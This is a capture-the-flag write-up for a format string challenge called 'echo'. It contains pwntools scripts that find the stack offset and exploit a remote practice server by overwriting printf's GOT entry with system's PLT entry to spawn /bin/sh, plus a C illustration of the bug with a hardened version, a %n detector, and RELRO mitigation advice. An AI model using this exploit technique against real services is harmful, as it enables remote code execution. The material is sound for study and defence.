The challenge name is already an obvious hint! echo ~ hint: format string
Looking at main in IDA, you can see printf(&s)!
On the principle of the vulnerability:
http://www.cnblogs.com/Ox9A82/p/5429099.html
Practice problems to go further:
https://www.anquanke.com/post/id/85785
https://www.anquanke.com/post/id/147666
Back to this challenge, first run checksec as usual:
Combining the knowledge from the links above, we start by leaking the offset:
Entering %p, the output is 0x100, which is the 256 = 0x100 that fgets reads. The offset can be obtained directly with the pwntools tool; the code is as follows:
```python
#!/usr/bin/env python
# coding=utf-8
from pwn import *

context.log_level = "debug"


def exec_fmt(payload):
    """Run the binary once with the given payload and return its output."""
    io = process("./echo")
    io.sendline(payload)
    info = io.recv()
    io.close()
    return info


# FmtStr probes the format string with exec_fmt to find the stack offset
autofmt = FmtStr(exec_fmt)
print(autofmt.offset)
```
The output is 7; test it:
Then overwrite printf's GOT entry with the address of system's PLT entry and send "/bin/sh": where printf originally printed that string, after the modification system("/bin/sh") is executed instead.
```python
#!/usr/bin/env python
# coding=utf-8
from pwn import *

# io = process("./echo")
io = remote("hackme.inndy.tw", 7711)
elf = ELF("./echo")
system_plt = elf.plt["system"]
printf_got = elf.got["printf"]

# offset 7 found above; write system@plt over printf@got
payload = fmtstr_payload(7, {printf_got: system_plt})
io.sendline(payload)
sleep(1)
# the next input is no longer printed but passed to system()
io.sendline("/bin/sh\x00")
io.interactive()
```
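As an added example that is not part of the writeup, here is a constructed C reconstruction of the bug pattern (fgets into a 256-byte buffer, then the buffer used as printf's format string) next to its hardened form, plus a check that flags the %n write directives the GOT overwrite above relies on; the binary's real source is not on the page, so the layout is assumed.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

#define BUF_SZ 256   /* assumed: matches the 0x100 fgets size seen above */

/* True if s contains any printf conversion (reads stack when used as a
   format string). "%%" is a literal percent and is skipped. */
bool has_format_directive(const char *s) {
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        return true;
    }
    return false;
}

/* True only if s contains a %n-style write directive, allowing flags,
   width, precision, positional "$" and length modifiers before the 'n'. */
bool has_write_directive(const char *s) {
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        p++;
        while (*p && strchr("-+ #0123456789.$hlLqjzt", *p)) p++;
        if (*p == 'n') return true;
        if (!*p) break;   /* trailing '%' at end of input */
    }
    return false;
}

/* Vulnerable echo as the writeup describes it: user data is the format. */
void vulnerable_echo(const char *s) { printf(s); }

/* Hardened echo: the buffer is only ever data, never a format. */
void safe_echo(const char *s) { fputs(s, stdout); }   /* or printf("%s", s) */

int main(void) {
    char s[BUF_SZ];
    if (!fgets(s, sizeof s, stdin)) return 1;
    if (has_write_directive(s))
        fputs("[detect] %n write directive in input\n", stderr);
    safe_echo(s);   /* vulnerable_echo(s) is what the challenge binary does */
    return 0;
}
```

Compiling with -Wformat-security warns on the printf(s) call, and full RELRO (-Wl,-z,relro,-z,now) makes the GOT read-only so the printf@got overwrite above would fault instead of redirecting control.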